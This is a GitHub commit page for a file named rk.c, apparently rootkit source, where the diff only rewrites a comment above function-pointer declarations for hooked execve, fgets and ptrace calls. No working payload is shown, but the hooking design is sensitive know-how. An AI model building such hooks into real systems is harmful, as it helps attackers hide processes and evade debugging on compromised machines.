Skip to content

Commit

Permalink
Update rk.c
Browse files Browse the repository at this point in the history
  • Loading branch information
c authored Jan 28, 2019
1 parent 35c692d commit b057d99
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion rk.c
Original file line number Diff line number Diff line change
Expand Up @@ -22,7 +22,7 @@
#include "rkconst.h"
//function pointers to hooked functions

// too lazy to group these hooks
// misc functions
int (*old_execve)(const char *path, char *const argv[], char *const envp[]);
char *(*old_fgets)(char *s, int size, FILE *stream);
long int (*old_ptrace)(enum __ptrace_request request, ...);
Expand Down

0 comments on commit b057d99

Please sign in to comment.